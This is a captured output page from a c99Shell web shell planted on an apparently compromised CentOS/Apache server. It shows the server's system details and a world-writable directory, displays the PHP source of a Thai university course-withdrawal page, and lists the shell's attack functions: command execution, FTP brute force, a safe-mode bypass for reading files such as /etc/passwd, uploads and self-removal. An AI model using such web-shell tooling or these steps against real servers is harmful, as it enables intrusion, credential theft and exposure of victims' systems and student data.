!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_showWithdraw.php (4.63 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$row_std 
= isset($qu_std) ? $qu_std->row() : NULL;
?>
<table width="100%">
    <tr>
        <td>
            <div align="center">
            <?php echo form_open($this->config->item("rg_folder")."regis/showWithdraw", array("name" => "myform""id" => "myform"));?>
            <table width="100%">
                <tr>
                    <td><b>รหัสนักศึกษา</b>
                    <input type="text" id="stdCode" name="stdCode" size="10" maxlength="10" class="required-int" />
                    <input type="submit" id="btnSearch" name="btnSearch" value="ค้นหา" /></td>
                </tr>
                <tr>
                    <td height="22"></td>
                </tr>
<?php
                
if(isset($flg)) {
                    echo 
$flg;
                }
                if (isset(
$stdCode)) {
                    if (
$stdCode) {
?>
                <tr>
                    <td><table class='szone'>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">รหัสนักศึกษา</td>
                            <td><?php echo getval('stdCode'$row_std);?>
                            <input type="hidden" name="stdId" value="<?php echo getval('stdId'$row_std);?>"></td>
                            <td class="coltd_szone">ชื่อ-นามสกุล</td>
                            <td><?php echo getval('prefixName'$row_std).getval('stdName'$row_std).' '.getval('stdSurname'$row_std);?></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">หลักสูตร</td>
                            <td><?php echo getval('curName'$row_std);?>
                            <input type="hidden" name="curId" value="<?php echo getval('curId'$row_std);?>"></td>
                            <td class="coltd_szone">ชั้นปี</td>
                            <td><?php echo getval('syCode'$row_std);?>
                            <input type="hidden" name="syId" value="<?php echo getval('syId'$row_std);?>" /></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">ปีการศึกษา</td>
                            <td><?php echo $acY;?>
                            <input type="hidden" name="acY" value="<?php echo $acY;?>" /></td>
                            <td class="coltd_szone">ภาคการศึกษา</td>
                            <td><?php echo $tmId;?>
                            <input type="hidden" name="tmId" value="<?php echo $tmId;?>" /></td>
                        </tr>
                    </table></td>
                </tr>
                <tr>
                    <td height="22"></td>
                </tr>
                <tr>
                    <td><table class="headCol">
                        <tr>
                            <th>รหัสรายวิชา</th>
                            <th>ชื่อรายวิชา</th>
                            <th>หน่วยกิต</th>
                            <th>กลุ่ม</th>
                            <th>ลบ</th>
                        </tr>
<?php
                        $i 
0;
                        foreach (
$rs_rd->result() as $row_rd) {
?>
                        <tr valign='top' onmouseover="bgColor='<?=$tr_color_even?>'" onmouseout="bgColor='<?=$this->config->item("rg_mouseout")?>'">
                            <td class='indent'><?php echo $row_rd->crsCode;?></td>
                            <td class='indent'><?php echo explodeSquare($row_rd->crsName);?></td>
                            <td align="center"><?php echo $row_rd->crsUnit;?></td>
                            <td align="center"><?php echo $row_rd->coSection;?></td>
                            <td align="center">
                            <span onClick="confirmDel2(
                            {stdId:<?php echo $row_rd->rdStdId;?>,
                             stdCode:<?php echo $row_std->stdCode;?>,
                             acY:<?php echo $row_rd->rdAcY;?>,
                             tmId:<?php echo $row_rd->rdTmId;?>,
                             seq:<?php echo $row_rd->rdSeq;?>,
                             coId:<?php echo $row_rd->rdCoId;?>,
                             rgStatus:'W'}, 'hidform','<?php echo site_url($this->config->item('rg_folder').'regis/rd_delete');?>')" /><img src="<?php echo base_url().$this->config->item("rg_delete");?>" align="absmiddle" border="0" width="16" height="19" class="hand"/></span></td>
                        </tr>
<?php
                            $i
++;
                        }    
// end foreach

                        
if (isset($kssFlag)) {
?>
                        <tr>
                            <td colspan="6" align="center"><span class='error'><?php echo $kssFlag;?></span></td>
                        </tr>
<?php
                        
}
?>
                        <tr>
                            <td height="22" colspan="2" align="right"><b>รวมหน่วยกิต</b></td>
                            <td align="center"><?php echo number_format($sumCrAt);?></td>
                            <td colspan="3"></td>
                        </tr>
                    </table></td>
                </tr>
<?php
                    
} else {
                        if (!isset(
$err_msg)) {
?>
                <tr>
                    <td align="center"><span class='error'><?php echo getval('prefixName'$row_std).getval('stdName'$row_std).' '.getval('stdSurname'$row_std).' '.getval('sstName'$row_std);?></span></td>
                </tr>
<?php
                        
} else {
?>
                <tr>
                    <td align="center"><span class='error'><?php echo $err_msg;?></span></td>
                </tr>
<?php
                        
}
                    }    
// end SearchByStCodeAndStudying
                
}
?>
            </table><?php echo form_close();?></div>
        <br></td>
    </tr>
    <tr>
        <td><span class="error"><b>หมายเหตุ</b> : ใช้งานเมนูนี้กรณีที่นักศึกษายื่นใบเพิ่ม/ถอน หลังช่วงเวลาเพิ่ม-ถอน</span></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0067 ]--